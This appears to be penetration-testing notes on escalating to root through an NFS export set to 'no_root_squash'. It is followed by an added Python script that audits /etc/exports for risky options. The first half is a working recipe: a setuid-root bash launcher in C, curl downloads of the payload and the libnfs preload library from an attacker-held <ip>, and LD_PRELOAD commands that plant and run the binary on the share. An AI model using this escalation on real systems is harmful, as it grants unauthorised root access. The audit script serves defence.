tcp/2049 NFS no_root_squash/no_all_squash misconfiguration PE
> showmount -e 127.0.0.1
Export list for 127.0.0.1:
/srv/Share 127.0.0.1/32,10.1.1.0/24
> cat /etc/exports
/srv/Share 10.1.1.0/24(insecure,rw)
/srv/Share 127.0.0.1/32(no_root_squash,insecure,rw)
> ./bootstrap
> ./configure
> make
> gcc -fPIC -shared -o ld_nfs.so examples/ld_nfs.c -ldl -lnfs -I./include/ -L./lib/.libs/
- create a simple exploit pwn.c and compile: gcc pwn.c -o pwn
int main(void){setreuid(0,0); system("/bin/bash"); return 0;}
- transfer the compiled example (i.e. ld_nfs.so), the exploit (i.e. pwn) and the other two libraries (i.e. libnfs.so, libnfs.so.13) from the lib/.libs folder to the target
> curl http://<ip>/pwn --output pwn
> curl http://<ip>/ld_nfs.so --output ld_nfs.so
> curl http://<ip>/libnfs.so --output libnfs.so
> curl http://<ip>/libnfs.so.13 --output libnfs.so.13
- prepare the exploit and run
> LD_NFS_UID=0 LD_LIBRARY_PATH=/home/megan/ LD_PRELOAD=./ld_nfs.so cp pwn nfs://127.0.0.1/srv/Share/pwn
> LD_NFS_UID=0 LD_LIBRARY_PATH=/home/megan/ LD_PRELOAD=./ld_nfs.so chown root: nfs://127.0.0.1/srv/Share/pwn
> LD_NFS_UID=0 LD_LIBRARY_PATH=/home/megan/ LD_PRELOAD=./ld_nfs.so chmod o+rx nfs://127.0.0.1/srv/Share/pwn
> LD_NFS_UID=0 LD_LIBRARY_PATH=/home/megan/ LD_PRELOAD=./ld_nfs.so chmod u+s nfs://127.0.0.1/srv/Share/pwn
> /srv/Share/pwn
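
Defender-side check for the export options this escalation depends on, as an added example (not part of the original notes): it parses exports(5) text and reports every client for which `no_root_squash` and/or `insecure` is in effect. Function names and severity labels are this example's own assumptions, and quoted paths are not handled.

```python
import re

# Toggle pairs from exports(5): (risky option, safe counterpart); the last one listed wins.
TOGGLES = [("no_root_squash", "root_squash"), ("insecure", "secure")]

# Constructed sample: the two export lines shown in /etc/exports above.
SAMPLE = """\
/srv/Share 10.1.1.0/24(insecure,rw)
/srv/Share 127.0.0.1/32(no_root_squash,insecure,rw)
"""

def parse_exports(text):
    """Yield (path, client, [options]) per client spec. Quoted paths are not handled."""
    text = text.replace("\\\n", " ")            # join continuation lines
    for line in text.splitlines():
        fields = line.split("#", 1)[0].split()  # strip comments
        if not fields:
            continue
        path, defaults = fields[0], []
        for spec in fields[1:]:
            if spec.startswith("-"):            # "-opt,opt": defaults for later clients
                defaults = spec[1:].split(",")
                continue
            m = re.fullmatch(r"([^()]*)(?:\(([^()]*)\))?", spec)
            if not m:
                continue
            own = m.group(2).split(",") if m.group(2) else []
            yield path, m.group(1) or "*", defaults + own

def risky_options(opts):
    """Return the risky options still in effect after last-one-wins resolution."""
    active = []
    for risky, safe in TOGGLES:
        seen = [o for o in opts if o in (risky, safe)]
        if seen and seen[-1] == risky:
            active.append(risky)
    return active

def audit(text):
    """Return (severity, path, client, risky options); severity labels are this example's own."""
    findings = []
    for path, client, opts in parse_exports(text):
        hits = risky_options(opts)
        if hits:
            # Both together: an unprivileged process on a permitted client can act as uid 0.
            sev = "high" if len(hits) == 2 else "medium" if hits == ["no_root_squash"] else "low"
            findings.append((sev, path, client, hits))
    return findings

if __name__ == "__main__":
    for sev, path, client, hits in audit(SAMPLE):
        print(f"[{sev}] {path} -> {client}: {','.join(hits)}")
```

Run it against the real file with `audit(open("/etc/exports").read())`; a loopback-only client such as 127.0.0.1/32 still counts, because local users can reach it.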